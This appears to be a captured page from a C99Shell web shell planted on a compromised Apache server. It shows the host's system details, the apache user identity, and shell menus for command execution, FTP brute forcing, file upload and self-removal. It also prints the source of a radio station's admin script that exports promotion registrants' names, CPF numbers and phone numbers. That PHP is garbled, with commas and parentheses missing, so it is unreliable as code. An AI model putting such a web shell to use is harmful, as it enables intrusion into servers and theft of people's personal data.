!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/var/www/html/site/ipanel/view/   drwxr-xr-x
Free 9.41 GB of 93.48 GB (10.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     cadastros.php (2.49 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    
if(preg_match"/MSIE/"$_SERVER['HTTP_USER_AGENT'])){
            
header('Cache-Control: maxage=3600');
            
header('Pragma: public');
    }
    
session_cache_limiter("private");
    include 
"../../load_ipanel.php";

    
define('FPDF_FONTPATH','font/');


    
$promocaoCtrl = new GenericCtrl("Promocao");
    
$promocao $promocaoCtrl->getObject($_GET['id']);

    
$pdf = new PDF();
    
$pdf->FPDF();
    
$pdf->Open();
    
$pdf->AddPage();
    
$pdf->SetAuthor("Continental FM");
    
$pdf->SetXY(1010);
    
$pdf->SetFillColor(255);
    
$pdf->SetFont('Arial''B'10); 

    
$pdf->Image("../../img/img_relatorios.jpg"10850);
    
$pdf->ln();
    
$pdf->Cell(804""00'L'0);
    
$pdf->SetFont('Arial''B'14);
    
$pdf->Cell(804"INSCRIÇÕES: PROMOÇÕES DA CONTI FM" 00'C'0);
    
$pdf->ln(5);
    
$pdf->SetFont('Arial''B'12);
    
$pdf->Cell(806""00'C'0);
    
$pdf->Cell(806$promocao['titulo'], 00'C'0);
    
$pdf->ln(7);
    
$pdf->SetFont('Arial'''8);
    
$pdf->Cell(806""00'C'0);
    
$pdf->Cell(1116,"Gerado em ".date("d/m/Y")." às ".date("H:i:s") , 00'R'0);
    
$pdf->Line(102820028);
    
$pdf->ln(9);

    
$pdf->SetFont('Arial''B'10);
    
$pdf->Cell(156"Nº"10'C'0);
    
$pdf->Cell(1056"Nome"10'L'0);
    
$pdf->Cell(356"CPF"10'C'0);
    
$pdf->Cell(356"Telefone"10'C'0);
    
$pdf->ln();
    
    
$inscricaoPromocaoCtrl = new GenericCtrl("InscricaoPromocao");
    
$inscricaoPromocao $inscricaoPromocaoCtrl->getObjectByField("proId",$_GET['id'], true00"id ASC");
    
    
$cont 0;
    
    
$util = new Util();
    
    foreach (
$inscricaoPromocao as $inscricao) {
        
        
$cont ++;
    
        
$pdf->SetFont('Arial''B'10);
        
$pdf->Cell(156$util->addZeros($cont3), 10'C'0);
        
$pdf->SetFont('Arial'''10);
        
$pdf->Cell(1056$inscricao['inscricao']['nome'], 10'L'0);
        
$pdf->Cell(356$util->formatarCpfCnpj($inscricao['inscricao']['cpf']), 10'C'0);
        
$pdf->Cell(356$util->formatarTelefone($inscricao['inscricao']['telefone']), 10'C'0);
        
$pdf->ln();
        
        
    }
    
    
$pdf->ln(8);
    
$pdf->SetFont('Arial''B'10);
    
$pdf->Cell(1656"Total de Inscrições para esta Promoção"10'L'0);
    
$pdf->SetFont('Arial''B'12);
    
$pdf->Cell(256$cont10'C'0);

    
$pdf->Output();
?>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0056 ]--